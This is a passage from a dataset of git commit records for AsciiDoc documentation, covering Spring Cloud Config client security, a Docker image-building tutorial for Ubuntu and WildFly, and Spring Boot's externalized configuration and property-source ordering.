Object>singletonMap(\"property.from.sample.custom.source\", \"worked as intended\"));\n }\n\n}\n----\n\nThe `Environment` that is passed in is the one for the\n`ApplicationContext` about to be created, i.e. the one that we are\nsupplying additional property sources for. It will already have its\nnormal Spring Boot-provided property sources, so you can use those to\nlocate a property source specific to this `Environment` (e.g. by\nkeying it on the `spring.application.name`, as is done in the default\nConfig Server property source locator).\n\nIf you create a jar with this class in it and then add a\n`META-INF\/spring.factories` containing:\n\n----\norg.springframework.cloud.bootstrap.BootstrapConfiguration=sample.custom.CustomPropertySourceLocator\n----\n\nthen the \"customProperty\" `PropertySource` will show up in any\napplication that includes that jar on its classpath.\n\n=== Security\n\nIf you use HTTP Basic security on the server then clients just need to\nknow the password (and username if it isn't the default). You can do\nthat via the config server URI, or via separate username and password\nproperties, e.g.\n\n.bootstrap.yml\n----\nspring:\n cloud:\n config:\n uri: https:\/\/user:secret@myconfig.mycompany.com\n----\n\nor\n\n.bootstrap.yml\n----\nspring:\n cloud:\n config:\n uri: https:\/\/myconfig.mycompany.com\n username: user\n password: secret\n----\n\nThe `spring.cloud.config.password` and `spring.cloud.config.username`\nvalues override anything that is provided in the URI.\n\nIf you deploy your apps on Cloud Foundry then the best way to provide\nthe password is through service credentials, e.g. in the URI, since\nthen it doesn't even need to be in a config file. An example which\nworks locally and for a user-provided service on Cloud Foundry named\n\"configserver\":\n\n.bootstrap.yml\n----\nspring:\n cloud:\n config:\n uri: ${vcap.services.configserver.credentials.uri:http:\/\/user:password@localhost:8888}\n\n----\n\nIf you use another form of security you might need to provide a\n`RestTemplate` to the `ConfigServicePropertySourceLocator` (e.g. by\ngrabbing it in the bootstrap context and injecting one).\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"8d58b6672f31a18580d44c0ae0780908a9f74cb7","subject":"fixing https:\/\/github.com\/javaee-samples\/docker-java\/issues\/112","message":"fixing https:\/\/github.com\/javaee-samples\/docker-java\/issues\/112\n","repos":"redhat-developer-demos\/docker-java,redhat-developer-demos\/docker-java","old_file":"chapters\/docker-image.adoc","new_file":"chapters\/docker-image.adoc","new_contents":"== Docker Image\n\n*PURPOSE*: This chapter explains how to create a Docker image.\n\nAs explained in <<Docker_Basics>>, Docker image is the *build component* of Docker and a read-only template of application operating system.\n\n=== Dockerfile\n\nDocker build images by reading instructions from a _Dockerfile_. A _Dockerfile_ is a text document that contains all the commands a user could call on the command line to assemble an image. `docker build` command uses this file and executes all the commands in succession to create an image.\n\n`build` command is also passed a context that is used during image creation. This context can be a path on your local filesystem or a URL to a Git repository.\n\n_Dockerfile_ is usually called _Dockerfile_. The complete list of commands that can be specified in this file are explained at https:\/\/docs.docker.com\/reference\/builder\/. The common commands are listed below:\n\n.Common commands for Dockerfile\n[width=\"100%\", options=\"header\", cols=\"1,4,4\"]\n|==================\n| Command | Purpose | Example\n| FROM | First non-comment instruction in _Dockerfile_ | `FROM ubuntu`\n| COPY | Copies mulitple source files from the context to the file system of the container at the specified path | `COPY .bash_profile \/home`\n| ENV | Sets the environment variable | `ENV HOSTNAME=test`\n| RUN | Executes a command | `RUN apt-get update`\n| CMD | Defaults for an executing container | `CMD [\"\/bin\/echo\", \"hello world\"]`\n| EXPOSE | Informs the network ports that the container will listen on | `EXPOSE 8093`\n|==================\n\n=== Create your first Docker image\n\n. Create a new directory.\n. Create a new text file, name it _Dockerfile_, and use the following contents:\n+\n[source, text]\n----\nFROM ubuntu\n\nCMD [\"\/bin\/echo\", \"hello world\"]\n----\n+\nThis image uses `ubuntu` as the base image. `CMD` command defines the command that needs to run. It provides a different entry point of `\/bin\/echo` and gives the argument \"`hello world`\".\n+\n. Build this image:\n+\n```console\n> docker build -t helloworld .\nSending build context to Docker daemon 2.048 kB\nStep 0 : FROM ubuntu\nPulling repository docker.io\/library\/ubuntu\na5a467fddcb8: Download complete \n3fd0c2ae8ed2: Download complete \n9e19ac89d27c: Download complete \nac65c371c3a5: Download complete \nStatus: Downloaded newer image for ubuntu:latest\n ---> a5a467fddcb8\nStep 1 : CMD \/bin\/echo hello world\n ---> Running in 132bb0bf823f\n ---> e81a394f71e3\nRemoving intermediate container 132bb0bf823f\nSuccessfully built e81a394f71e3\n```\n+\n`.` in this command is the context for `docker build`.\n+\n. List the images available:\n+\n```console\n> docker images\nREPOSITORY TAG IMAGE ID CREATED VIRTUAL SIZE\nhelloworld latest 9c0e7b56cbee 13 minutes ago 187.9 MB\n```\n+\n. Run the container:\n+\n docker run -it helloworld\n+\nto see the output:\n+\n hello world\n+\n. Change the base image from `ubuntu` to `busybox` in `Dockerfile`. Build the image again:\n+\n docker build -t helloworld2 .\n+\nand view the images as:\n+\n```console\n> docker images\nREPOSITORY TAG IMAGE ID CREATED VIRTUAL SIZE\nhelloworld latest e81a394f71e3 26 minutes ago 187.9 MB\nhelloworld2 latest c458787fadcf 3 seconds ago 1.113 MB\nubuntu latest a5a467fddcb8 2 days ago 187.9 MB\nbusybox latest 3d5bcd78e074 4 days ago 1.113 MB\n```\n\n=== WildFly Image\n\n. Create a new directory.\n. Create a new text file, name it _Dockerfile_, and use the following contents:\n+\n[source, text]\n----\nFROM jboss\/wildfly\n----\n+\n. Build the image:\n+\n docker build -t mywildfly .\n+\n. Run the container:\n+\n docker run -it mywildfly\n\n=== Java EE 7 Application Image\n\n. Create a new directory.\n. Create a new text file, name it _Dockerfile_, and use the following contents:\n+\n[source, text]\n----\nFROM jboss\/wildfly <1>\n\nCMD [\"\/opt\/jboss\/wildfly\/bin\/standalone.sh\", \"-c\", \"standalone-full.xml\", \"-b\", \"0.0.0.0\"] <2>\n\nRUN curl -L https:\/\/github.com\/javaee-samples\/javaee7-hol\/raw\/master\/solution\/movieplex7-1.0-SNAPSHOT.war -o \/opt\/jboss\/wildfly\/standalone\/deployments\/movieplex7-1.0-SNAPSHOT.war <3>\n----\n+\nThree things in this image:\n+\n<1> Uses \"`jboss\/wildfly`\" as the base image\n<2> Starts WildFly application server in Full Platform mode\n<3> Copies the WAR file from from a URL to the deployment directory of WildFly\n+\n. Build the image:\n\n docker build -t movieplex .\n\n=== Dockerfile Command Design Patterns\n\n==== Difference between CMD and ENTRYPOINT\n\n*TL;DR* `CMD` will work for most of the cases.\n\nDefault entry point for a container is `\/bin\/sh`, the default shell.\n\nRunning a container as `docker run -it ubuntu` uses that command and starts the default shell. The output is shown as:\n\n```console\n> docker run -it ubuntu\nroot@88976ddee107:\/#\n```\n\n`ENTRYPOINT` allows to override the entry point to some other command, and even customize it. For example, a container can be started as:\n\n```console\n> docker run -it --entrypoint=\/bin\/cat ubuntu \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\n. . .\n```\n\nThis command overrides the entry point to the container to `\/bin\/cat`. The argument(s) passed to the CLI are used by the entry point.\n\n==== Difference between ADD and COPY\n\n*TL;DR* `COPY` will work for most of the cases.\n\n`ADD` has all capabilities of `COPY` and has the following additional features:\n\n. Allows tar file auto-extraction in the image, for example, `ADD app.tar.gz \/opt\/var\/myapp`.\n. Allows files to be downloaded from a remote URL. However, the downloaded files will become part of the image. This causes the image size to bloat. So its recommended to use `curl` or `wget` to download the archive explicitly, extract, and remove the archive.\n\n==== Import and export images\n\nDocker images can be saved using `save` command to a .tar file:\n\n docker save helloworld > helloworld.tar\n\nThese tar files can then be imported using `load` command:\n\n docker load -i helloworld.tar\n\n\n","old_contents":"== Docker Image\n\n*PURPOSE*: This chapter explains how to create a Docker image.\n\nAs explained in <<Docker_Basics>>, Docker image is the *build component* of Docker and a read-only template of application operating system.\n\n=== Dockerfile\n\nDocker build images by reading instructions from a _Dockerfile_. A _Dockerfile_ is a text document that contains all the commands a user could call on the command line to assemble an image. `docker build` command uses this file and executes all the commands in succession to create an image.\n\n`build` command is also passed a context that is used during image creation. This context can be a path on your local filesystem or a URL to a Git repository.\n\n_Dockerfile_ is usually called _Dockerfile_. The complete list of commands that can be specified in this file are explained at https:\/\/docs.docker.com\/reference\/builder\/. The common commands are listed below:\n\n.Common commands for Dockerfile\n[width=\"100%\", options=\"header\", cols=\"1,4,4\"]\n|==================\n| Command | Purpose | Example\n| FROM | First non-comment instruction in _Dockerfile_ | `FROM ubuntu`\n| COPY | Copies mulitple source files from the context to the file system of the container at the specified path | `COPY .bash_profile \/home`\n| ENV | Sets the environment variable | `ENV HOSTNAME=test`\n| RUN | Executes a command | `RUN apt-get update`\n| CMD | Defaults for an executing container | `CMD [\"\/bin\/echo\", \"hello world\"]`\n| EXPOSE | Informs the network ports that the container will listen on | `EXPOSE 8093`\n|==================\n\n=== Create your first Docker image\n\nCreate a new text file _Dockerfile_ in an empty directory and use the following contents:\n\n.Hello World Dockerfile\n[source, text]\n----\nFROM ubuntu\n\nCMD [\"\/bin\/echo\", \"hello world\"]\n----\n\nThis image uses `ubuntu` as the base image. `CMD` command defines the command that needs to run. It provides a different entry point of `\/bin\/echo` and gives the argument \"`hello world`\".\n\nBuild this image as:\n\n[source, text]\n----\n> docker build -t helloworld .\nSending build context to Docker daemon 2.048 kB\nStep 0 : FROM ubuntu\nPulling repository docker.io\/library\/ubuntu\na5a467fddcb8: Download complete \n3fd0c2ae8ed2: Download complete \n9e19ac89d27c: Download complete \nac65c371c3a5: Download complete \nStatus: Downloaded newer image for ubuntu:latest\n ---> a5a467fddcb8\nStep 1 : CMD \/bin\/echo hello world\n ---> Running in 132bb0bf823f\n ---> e81a394f71e3\nRemoving intermediate container 132bb0bf823f\nSuccessfully built e81a394f71e3\n----\n\nList the images available:\n\n[source, text]\n----\n> docker images\nREPOSITORY TAG IMAGE ID CREATED VIRTUAL SIZE\nhelloworld latest 9c0e7b56cbee 13 minutes ago 187.9 MB\n----\n\nRun the container:\n\n docker run -it helloworld\n\nto see the output:\n\n hello world\n\nChange the base image from `ubuntu` to `busybox`, build the image again:\n\n docker build -t helloworld2 .\n\n[source, text]\n----\n> docker images\nREPOSITORY TAG IMAGE ID CREATED VIRTUAL SIZE\nhelloworld latest e81a394f71e3 26 minutes ago 187.9 MB\nhelloworld2 latest c458787fadcf 3 seconds ago 1.113 MB\nubuntu latest a5a467fddcb8 2 days ago 187.9 MB\nbusybox latest 3d5bcd78e074 4 days ago 1.113 MB\n----\n\n=== Run WildFly\n\nCreate a new text file _Dockerfile_ in an empty directory and use the following contents:\n\n[source, text]\n----\nFROM jboss\/wildfly\n----\n\nBuild the image:\n\n docker build -t mywildfly .\n\nRun the container:\n\n docker run -it mywildfly\n\n=== Deploy Java EE 7 Application\n\nCreate a new text file _Dockerfile_ in an empty directory:\n\n[source, text]\n----\nFROM jboss\/wildfly\n\nCMD [\"\/opt\/jboss\/wildfly\/bin\/standalone.sh\", \"-c\", \"standalone-full.xml\", \"-b\", \"0.0.0.0\"]\n\nRUN curl -L https:\/\/github.com\/javaee-samples\/javaee7-hol\/raw\/master\/solution\/movieplex7-1.0-SNAPSHOT.war -o \/opt\/jboss\/wildfly\/standalone\/deployments\/movieplex7-1.0-SNAPSHOT.war\n----\n\nThree things happen in this image:\n. Uses \"`jboss\/wildfly`\" as the base image\n. Starts WildFly application server in Full Platform mode\n. Copies the WAR file from from a URL to the deployment directory of WildFly\n\nBuild the image:\n\n docker build -t movieplex .\n\n=== Dockerfile Command Design Patterns\n\n==== Difference between CMD and ENTRYPOINT\n\n*TL;DR* `CMD` will work for most of the cases.\n\nDefault entry point for a container is `\/bin\/sh`, the default shell.\n\nRunning a container as `docker run -it ubuntu` uses that command and starts the default shell. The output is shown as:\n\n[source, text]\n----\n> docker run -it ubuntu\nroot@88976ddee107:\/#\n----\n\n`ENTRYPOINT` allows to override the entry point to some other command, and even customize it. For example, a container can be started as:\n\n[source, text]\n----\n> docker run -it --entrypoint=\/bin\/cat ubuntu \/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\n. . .\n----\n\nThis command overrides the entry point to the container to `\/bin\/cat`. The argument(s) passed to the CLI are used by the entry point.\n\n==== Difference between ADD and COPY\n\n*TL;DR* `COPY` will work for most of the cases.\n\n`ADD` has all capabilities of `COPY` and has the following additional features:\n\n. Allows tar file auto-extraction in the image, for example, `ADD app.tar.gz \/opt\/var\/myapp`.\n. Allows files to be downloaded from a remote URL. However, the downloaded files will become part of the image. This causes the image size to bloat. So its recommended to use `curl` or `wget` to download the archive explicitly, extract, and remove the archive.\n\n==== Import and export images\n\nDocker images can be saved using `save` command to a .tar file:\n\n docker save helloworld > helloworld.tar\n\nThese tar files can then be imported using `load` command:\n\n docker load -i helloworld.tar\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b3a46fc50e9e0f08cd5d98e90941afc0e462f394","subject":"Document that placeholders should us the canonical property name form","message":"Document that placeholders should us the canonical property name form\n\nCloses gh-31309\n","repos":"vpavic\/spring-boot,dreis2211\/spring-boot,wilkinsona\/spring-boot,chrylis\/spring-boot,michael-simons\/spring-boot,htynkn\/spring-boot,chrylis\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,wilkinsona\/spring-boot,scottfrederick\/spring-boot,scottfrederick\/spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,htynkn\/spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,scottfrederick\/spring-boot,chrylis\/spring-boot,dreis2211\/spring-boot,aahlenst\/spring-boot,scottfrederick\/spring-boot,scottfrederick\/spring-boot,htynkn\/spring-boot,vpavic\/spring-boot,vpavic\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,vpavic\/spring-boot,aahlenst\/spring-boot,michael-simons\/spring-boot,vpavic\/spring-boot,wilkinsona\/spring-boot,aahlenst\/spring-boot,dreis2211\/spring-boot,aahlenst\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,spring-projects\/spring-boot,wilkinsona\/spring-boot,michael-simons\/spring-boot,mdeinum\/spring-boot,mdeinum\/spring-boot,dreis2211\/spring-boot,scottfrederick\/spring-boot,spring-projects\/spring-boot,mdeinum\/spring-boot,spring-projects\/spring-boot,wilkinsona\/spring-boot,spring-projects\/spring-boot,chrylis\/spring-boot,chrylis\/spring-boot,michael-simons\/spring-boot,dreis2211\/spring-boot,mdeinum\/spring-boot,wilkinsona\/spring-boot,vpavic\/spring-boot,michael-simons\/spring-boot,spring-projects\/spring-boot,htynkn\/spring-boot","old_file":"spring-boot-project\/spring-boot-docs\/src\/docs\/asciidoc\/features\/external-config.adoc","new_file":"spring-boot-project\/spring-boot-docs\/src\/docs\/asciidoc\/features\/external-config.adoc","new_contents":"[[features.external-config]]\n== Externalized Configuration\nSpring Boot lets you externalize your configuration so that you can work with the same application code in different environments.\nYou can use a variety of external configuration sources, include Java properties files, YAML files, environment variables, and command-line arguments.\n\nProperty values can be injected directly into your beans by using the `@Value` annotation, accessed through Spring's `Environment` abstraction, or be <<features#features.external-config.typesafe-configuration-properties,bound to structured objects>> through `@ConfigurationProperties`.\n\nSpring Boot uses a very particular `PropertySource` order that is designed to allow sensible overriding of values.\nProperties are considered in the following order (with values from lower items overriding earlier ones):\n\n. Default properties (specified by setting `SpringApplication.setDefaultProperties`).\n. {spring-framework-api}\/context\/annotation\/PropertySource.html[`@PropertySource`] annotations on your `@Configuration` classes.\n Please note that such property sources are not added to the `Environment` until the application context is being refreshed.\n This is too late to configure certain properties such as `+logging.*+` and `+spring.main.*+` which are read before refresh begins.\n. Config data (such as `application.properties` files).\n. A `RandomValuePropertySource` that has properties only in `+random.*+`.\n. OS environment variables.\n. Java System properties (`System.getProperties()`).\n. JNDI attributes from `java:comp\/env`.\n. `ServletContext` init parameters.\n. `ServletConfig` init parameters.\n. Properties from `SPRING_APPLICATION_JSON` (inline JSON embedded in an environment variable or system property).\n. Command line arguments.\n. `properties` attribute on your tests.\n Available on {spring-boot-test-module-api}\/context\/SpringBootTest.html[`@SpringBootTest`] and the <<features#features.testing.spring-boot-applications.autoconfigured-tests,test annotations for testing a particular slice of your application>>.\n. {spring-framework-api}\/test\/context\/TestPropertySource.html[`@TestPropertySource`] annotations on your tests.\n. <<using#using.devtools.globalsettings,Devtools global settings properties>> in the `$HOME\/.config\/spring-boot` directory when devtools is active.\n\nConfig data files are considered in the following order:\n\n. <<features#features.external-config.files,Application properties>> packaged inside your jar (`application.properties` and YAML variants).\n. <<features#features.external-config.files.profile-specific,Profile-specific application properties>> packaged inside your jar (`application-\\{profile}.properties` and YAML variants).\n. <<features#features.external-config.files,Application properties>> outside of your packaged jar (`application.properties` and YAML variants).\n. <<features#features.external-config.files.profile-specific,Profile-specific application properties>> outside of your packaged jar (`application-\\{profile}.properties` and YAML variants).\n\nNOTE: It is recommended to stick with one format for your entire application.\nIf you have configuration files with both `.properties` and `.yml` format in the same location, `.properties` takes precedence.\n\nTo provide a concrete example, suppose you develop a `@Component` that uses a `name` property, as shown in the following example:\n\n[source,java,indent=0,subs=\"verbatim\"]\n----\ninclude::{docs-java}\/features\/externalconfig\/MyBean.java[]\n----\n\nOn your application classpath (for example, inside your jar) you can have an `application.properties` file that provides a sensible default property value for `name`.\nWhen running in a new environment, an `application.properties` file can be provided outside of your jar that overrides the `name`.\nFor one-off testing, you can launch with a specific command line switch (for example, `java -jar app.jar --name=\"Spring\"`).\n\nTIP: The `env` and `configprops` endpoints can be useful in determining why a property has a particular value.\nYou can use these two endpoints to diagnose unexpected property values.\nSee the \"<<actuator#actuator.endpoints, Production ready features>>\" section for details.\n\n\n\n[[features.external-config.command-line-args]]\n=== Accessing Command Line Properties\nBy default, `SpringApplication` converts any command line option arguments (that is, arguments starting with `--`, such as `--server.port=9000`) to a `property` and adds them to the Spring `Environment`.\nAs mentioned previously, command line properties always take precedence over file-based property sources.\n\nIf you do not want command line properties to be added to the `Environment`, you can disable them by using `SpringApplication.setAddCommandLineProperties(false)`.\n\n\n\n[[features.external-config.application-json]]\n=== JSON Application Properties\nEnvironment variables and system properties often have restrictions that mean some property names cannot be used.\nTo help with this, Spring Boot allows you to encode a block of properties into a single JSON structure.\n\nWhen your application starts, any `spring.application.json` or `SPRING_APPLICATION_JSON` properties will be parsed and added to the `Environment`.\n\nFor example, the `SPRING_APPLICATION_JSON` property can be supplied on the command line in a UN{asterisk}X shell as an environment variable:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ SPRING_APPLICATION_JSON='{\"my\":{\"name\":\"test\"}}' java -jar myapp.jar\n----\n\nIn the preceding example, you end up with `my.name=test` in the Spring `Environment`.\n\nThe same JSON can also be provided as a system property:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -Dspring.application.json='{\"my\":{\"name\":\"test\"}}' -jar myapp.jar\n----\n\nOr you could supply the JSON by using a command line argument:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -jar myapp.jar --spring.application.json='{\"my\":{\"name\":\"test\"}}'\n----\n\nIf you are deploying to a classic Application Server, you could also use a JNDI variable named `java:comp\/env\/spring.application.json`.\n\nNOTE: Although `null` values from the JSON will be added to the resulting property source, the `PropertySourcesPropertyResolver` treats `null` properties as missing values.\nThis means that the JSON cannot override properties from lower order property sources with a `null` value.\n\n\n\n[[features.external-config.files]]\n=== External Application Properties [[features.external-config.files]]\nSpring Boot will automatically find and load `application.properties` and `application.yaml` files from the following locations when your application starts:\n\n. From the classpath\n.. The classpath root\n.. The classpath `\/config` package\n. From the current directory\n.. The current directory\n.. The `\/config` subdirectory in the current directory\n.. Immediate child directories of the `\/config` subdirectory\n\nThe list is ordered by precedence (with values from lower items overriding earlier ones).\nDocuments from the loaded files are added as `PropertySources` to the Spring `Environment`.\n\nIf you do not like `application` as the configuration file name, you can switch to another file name by specifying a configprop:spring.config.name[] environment property.\nFor example, to look for `myproject.properties` and `myproject.yaml` files you can run your application as follows:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -jar myproject.jar --spring.config.name=myproject\n----\n\nYou can also refer to an explicit location by using the configprop:spring.config.location[] environment property.\nThis property accepts a comma-separated list of one or more locations to check.\n\nThe following example shows how to specify two distinct files:\n\n[source,shell,indent=0,subs=\"verbatim\"]\n----\n\t$ java -jar myproject.jar --spring.config.location=\\\n\t\toptional:classpath:\/default.properties,\\\n\t\toptional:classpath:\/override.properties\n----\n\nTIP: Use the prefix `optional:` if the <<features#features.external-config.files.optional-prefix,locations are optional>> and you do not mind if they do not exist.\n\nWARNING: `spring.config.name`, `spring.config.location`, and `spring.config.additional-location` are used very early to determine which files have to be loaded.\nThey must be defined as an environment property (typically an OS environment variable, a system property, or a command-line argument).\n\nIf `spring.config.location` contains directories (as opposed to files), they should end in `\/`.\nAt runtime they will be appended with the names generated from `spring.config.name` before being loaded.\nFiles specified in `spring.config.location` are imported directly.\n\nNOTE: Both directory and file location values are also expanded to check for <<features#features.external-config.files.profile-specific,profile-specific files>>.\nFor example, if you have a `spring.config.location` of `classpath:myconfig.properties`, you will also find appropriate `classpath:myconfig-<profile>.properties` files are loaded.\n\nIn most situations, each configprop:spring.config.location[] item you add will reference a single file or directory.\nLocations are processed in the order that they are defined and later ones can override the values of earlier ones.\n\n[[features.external-config.files.location-groups]]\nIf you have a complex location setup, and you use profile-specific configuration files, you may need to provide further hints so that Spring Boot knows how they should be grouped.\nA location group is a collection of locations that are all considered at the same level.\nFor example, you might want to group all classpath locations, then all external locations.\nItems within a location group should be separated with `;`.\nSee the example in the \"`<<features#features.external-config.files.profile-specific>>`\" section for more details.\n\nLocations configured by using `spring.config.location` replace the default locations.\nFor example, if `spring.config.location` is configured with the value `optional:classpath:\/custom-config\/,optional:file:.\/custom-config\/`, the complete set of locations considered is:\n\n. `optional:classpath:custom-config\/`\n. `optional:file:.\/custom-config\/`\n\nIf you prefer to add additional locations, rather than replacing them, you can use `spring.config.additional-location`.\nProperties loaded from additional locations can override those in the default locations.\nFor example, if `spring.config.additional-location` is configured with the value `optional:classpath:\/custom-config\/,optional:file:.\/custom-config\/`, the complete set of locations considered is:\n\n. `optional:classpath:\/;optional:classpath:\/config\/`\n. `optional:file:.\/;optional:file:.\/config\/;optional:file:.\/config\/*\/`\n. `optional:classpath:custom-config\/`\n. `optional:file:.\/custom-config\/`\n\nThis search ordering lets you specify default values in one configuration file and then selectively override those values in another.\nYou can provide default values for your application in `application.properties` (or whatever other basename you choose with `spring.config.name`) in one of the default locations.\nThese default values can then be overridden at runtime with a different file located in one of the custom locations.\n\nNOTE: If you use environment variables rather than system properties, most operating systems disallow period-separated key names, but you can use underscores instead (for example, configprop:spring.config.name[format=envvar] instead of configprop:spring.config.name[]).\nSee <<features#features.external-config.typesafe-configuration-properties.relaxed-binding.environment-variables>> for details.\n\nNOTE: If your application runs in a servlet container or application server, then JNDI properties (in `java:comp\/env`) or servlet context initialization parameters can be used instead of, or as well as, environment variables or system properties.\n\n\n\n[[features.external-config.files.optional-prefix]]\n==== Optional Locations\nBy default, when a specified config data location does not exist, Spring Boot will throw a `ConfigDataLocationNotFoundException` and your application will not start.\n\nIf you want to specify a location, but you do not mind if it does not always exist, you can use the `optional:` prefix.\nYou can use this prefix with the `spring.config.location` and `spring.config.additional-location` properties, as well as with <<features#features.external-config.files.importing, `spring.config.import`>> declarations.\n\nFor example, a `spring.config.import` value of `optional:file:.\/myconfig.properties` allows your application to start, even if the `myconfig.properties` file is missing.\n\nIf you want to ignore all `ConfigDataLocationNotFoundExceptions` and always continue to start your application, you can use the `spring.config.on-not-found` property.\nSet the value to `ignore` using `SpringApplication.setDefaultProperties(...)` or with a system\/environment variable.\n\n\n\n[[features.external-config.files.wildcard-locations]]\n==== Wildcard Locations\nIf a config file location includes the `{asterisk}` character for the last path segment, it is considered a wildcard location.\nWildcards are expanded when the config is loaded so that immediate subdirectories are also checked.\nWildcard locations are particularly useful in an environment such as Kubernetes when there are multiple sources of config properties.\n\nFor example, if you have some Redis configuration and some MySQL configuration, you might want to keep those two pieces of configuration separate, while requiring that both those are present in an `application.properties` file.\nThis might result in two separate `application.properties` files mounted at different locations such as `\/config\/redis\/application.properties` and `\/config\/mysql\/application.properties`.\nIn such a case, having a wildcard location of `config\/*\/`, will result in both files being processed.\n\nBy default, Spring Boot includes `config\/*\/` in the default search locations.\nIt means that all subdirectories of the `\/config` directory outside of your jar will be searched.\n\nYou can use wildcard locations yourself with the `spring.config.location` and `spring.config.additional-location` properties.\n\nNOTE: A wildcard location must contain only one `{asterisk}` and end with `{asterisk}\/` for search locations that are directories or `*\/<filename>` for search locations that are files.\nLocations with wildcards are sorted alphabetically based on the absolute path of the file names.\n\nTIP: Wildcard locations only work with external directories.\nYou cannot use a wildcard in a `classpath:` location.\n\n\n\n[[features.external-config.files.profile-specific]]\n==== Profile Specific Files\nAs well as `application` property files, Spring Boot will also attempt to load profile-specific files using the naming convention `application-\\{profile}`.\nFor example, if your application activates a profile named `prod` and uses YAML files, then both `application.yml` and `application-prod.yml` will be considered.\n\nProfile-specific properties are loaded from the same locations as standard `application.properties`, with profile-specific files always overriding the non-specific ones.\nIf several profiles are specified, a last-wins strategy applies.\nFor example, if profiles `prod,live` are specified by the configprop:spring.profiles.active[] property, values in `application-prod.properties` can be overridden by those in `application-live.properties`.\n\n[NOTE]\n====\nThe last-wins strategy applies at the <<features#features.external-config.files.location-groups,location group>> level.\nA configprop:spring.config.location[] of `classpath:\/cfg\/,classpath:\/ext\/` will not have the same override rules as `classpath:\/cfg\/;classpath:\/ext\/`.\n\nFor example, continuing our `prod,live` example above, we might have the following files:\n\n----\n\/cfg\n application-live.properties\n\/ext\n application-live.properties\n application-prod.properties\n----\n\nWhen we have a configprop:spring.config.location[] of `classpath:\/cfg\/,classpath:\/ext\/` we process all `\/cfg` files before all `\/ext` files:\n\n. `\/cfg\/application-live.properties`\n. `\/ext\/application-prod.properties`\n. `\/ext\/application-live.properties`\n\n\nWhen we have `classpath:\/cfg\/;classpath:\/ext\/` instead (with a `;` delimiter) we process `\/cfg` and `\/ext` at the same level:\n\n. `\/ext\/application-prod.properties`\n. `\/cfg\/application-live.properties`\n. `\/ext\/application-live.properties`\n====\n\nThe `Environment` has a set of default profiles (by default, `[default]`) that are used if no active profiles are set.\nIn other words, if no profiles are explicitly activated, then properties from `application-default` are considered.\n\nNOTE: Properties files are only ever loaded once.\nIf you have already directly <<features#features.external-config.files.importing,imported>> a profile specific property files then it will not be imported a second time.\n\n\n\n[[features.external-config.files.importing]]\n==== Importing Additional Data\nApplication properties may import further config data from other locations using the `spring.config.import` property.\nImports are processed as they are discovered, and are treated as additional documents inserted immediately below the one that declares the import.\n\nFor example, you might have the following in your classpath `application.properties` file:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tspring:\n\t application:\n\t name: \"myapp\"\n\t config:\n\t import: \"optional:file:.\/dev.properties\"\n----\n\nThis will trigger the import of a `dev.properties` file in current directory (if such a file exists).\nValues from the imported `dev.properties` will take precedence over the file that triggered the import.\nIn the above example, the `dev.properties` could redefine `spring.application.name` to a different value.\n\nAn import will only be imported once no matter how many times it is declared.\nThe order an import is defined inside a single document within the properties\/yaml file does not matter.\nFor instance, the two examples below produce the same result:\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tspring:\n\t config:\n\t import: \"my.properties\"\n\tmy:\n\t property: \"value\"\n----\n\n[source,yaml,indent=0,subs=\"verbatim\",configblocks]\n----\n\tmy:\n\t property: \"value\"\n\tspring:\n\t config:\n\t import: \"my.properties\"\n----\n\nIn both of the above examples, the values from the `my.properties` file will take precedence over the file that triggered its import.\n\nSeveral locations can be specified under a single `spring.config.import` key.\nLocations will be processed in the order that they are defined, with later imports taking precedence.\n\nNOTE: When appropriate, <<features#features.external-config.files.profile-specific, Profile-specific variants>> are also considered for import.\nThe example above would import both `my.properties` as well as any `my-<profile>.properties` variants.\n\n[TIP]\n====\nSpring Boot includes pluggable API that allows various different location addresses to be supported.\nBy default you can import Java Properties, YAML and \"`<<features#features.external-config.files.configtree, configuration trees>>`\".\n\nThird-party jars can offer support for additional technologies (there is no requirement for files to be local).\nFor example, you can imagine config data being from external stores such as Consul, Apache ZooKeeper or Netflix Archaius.\n\nIf you want to support your own locations, see the `ConfigDataLocationResolver` and `ConfigDataLoader` classes in the `org.springframework.boot.context.config` package.\n====\n\n\n\n[[features.external-config.files.importing-extensionless]]\n==== Importing Extensionless Files\nSome cloud platforms cannot add a file extension to volume mounted files.\nTo import these extensionless files, you need to give Spring Boot a hint so that it knows how to load them.\nYou can do this by putting an extension hint in square brackets.\n\nFor example, suppose you have a `\/etc\/config\/myconfig` file that you wish to import as yaml.\nYou can import it from your `application.properties` using the following:\n\n[source,yaml,indent=0,subs=\"verbatim\",configprops,configblocks]\n----\n\tspring:\n\t config:\n\t import: \"file:\/etc\/config\/myconfig[.yaml]\"\n----\n\n\n\n[[features.external-config.files.configtree]]\n==== Using Configuration Trees\nWhen running applications on a cloud platform (such as Kubernetes) you often need to read config values that the platform supplies.\nIt is not uncommon to use environment variables for such purposes, but this can have drawbacks, especially if the value is supposed to be kept secret.\n\nAs an alternative to environment variables, many cloud platforms now allow you to map configuration into mounted data volumes.\nFor example, Kubernetes can volume mount both https:\/\/kubernetes.io\/docs\/tasks\/configure-pod-container\/configure-pod-configmap\/#populate-a-volume-with-data-stored-in-a-configmap[`ConfigMaps`] and 